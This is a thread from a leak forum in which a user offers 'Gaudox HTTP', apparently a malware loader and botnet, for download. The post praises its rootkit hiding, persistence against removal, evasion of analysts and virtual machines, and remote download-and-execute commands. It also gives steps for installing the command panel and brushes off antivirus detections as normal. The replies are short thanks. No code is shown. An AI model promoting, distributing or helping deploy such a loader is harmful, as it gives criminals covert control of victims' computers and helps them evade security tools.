Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

Gaudox HTTP - Ring3 Rootkit, Watchdog, Stable


  • Please log in to reply
6 replies to this topic

#1
xuNsh1neV3

  • Offline
  • New Member

  • PipPip
  • Posts:
    16
    Reputation:
    1
    Joined:
    29 Apr, 2016
Gaudox is an HTTP loader completely coded from scratch in C/C++ language with a few lines of Assembly, which means that it does not require of any dependencies ( C-Runtime, NET Framework, Java VM ). The bot has been fully tested and working on all Windows versions from Windows XP SP2 to Windows 10 (32/64-bit). It is also worth mentioning that I coded this bot with very efficient and stable designed code to handle thousands of connections at once.
 
Features
 
Usermode Rootkit
Bot has Rootkit functionality which hides all bot resources and prevents from being accessed from explorer process. This feature does not drop any to disk, the code is internally embedded in the bot file and injected in the target process from memory. It is also has self-protection that prevents the hooks from being removed by third-party programs or any security tool. This feature is currently working on 32-bit systems.
 
Persistence/Watchdog
Bot prevents it from being removed from the system by bot killers, security tools or user actions. This feature is currently supporting process protection and working on both 32/64-bit systems but its maximum compatibility is in 32-bit.
 
Traffic Encrypted
The communication between the bot and the control panel is obfuscated. This prevents middle attacks.
 
Anti-Analysis/Research
Bot contains several methods for preventing from being analyzed by researchers or unauthorized users. some methods are from preventing static analysis by obfuscating code, data up to detect the presence of debuggers, avoid running the bot in virtualized environments, etc. some methods may not be mentioned.
 
Commands
* Download and execute (Drop&Exec)
* Visit Website (Visible)
* Update Client
* Uninstall Client
 
How to install
1) Open the Builder and create a new profile, you will use these values KEY #1 and KEY #2 in the panel.
2) Create a new database (recommended)
3) Open setup.php with browser and complete the form.
4) Delete setup.php and open login.php with browser.
5) When creating the bot clients do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel.
 
Notes
1) I highly recommend disabling strict mode in MySQL.
2) I f you test the bot from a local server, the panel may be showing "US" in location, it's not an error, the panel expects to always get an external IP.
 
Download:
Hidden Content
You'll be able to see the hidden content once you reply to this topic.
 
VT:

Please Login or Register to see this Hidden Content


  • 0

Leaks are copied from my Leakforums threads - please rate the leaks and don't just leech!

Some leaks are shown as infected on VT - thats normal - just run them in VM if you don't trust! This are just collected leaks on my HDD - there may be leaks from nulled - please delete them.


#2
ekarbi31

  • Offline
  • Lurker

  • Posts:
    5
    Reputation:
    0
    Joined:
    01 May, 2016

t


  • 0

#3
shadyspop

  • Offline
  • 4:20pm

  • Posts:
    169
    Reputation:
    24
    Joined:
    24 Sep, 2015

ty


  • 0

#4
shiznith

  • Offline
  • Lurker

  • Posts:
    8
    Reputation:
    0
    Joined:
    07 Jul, 2015

Thanks mate... would try this


  • 0

#5
Redfire31

  • Offline
  • Addicted

  • Posts:
    232
    Reputation:
    8
    Joined:
    02 Aug, 2015

ty


  • 0

#6
midou14

  • Offline
  • Lurker

  • Posts:
    4
    Reputation:
    0
    Joined:
    02 May, 2016

thanks mate


  • 0

#7
fogus

  • Offline
  • Lurker

  • Posts:
    4
    Reputation:
    0
    Joined:
    02 May, 2016

Try it

 


  • 0


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users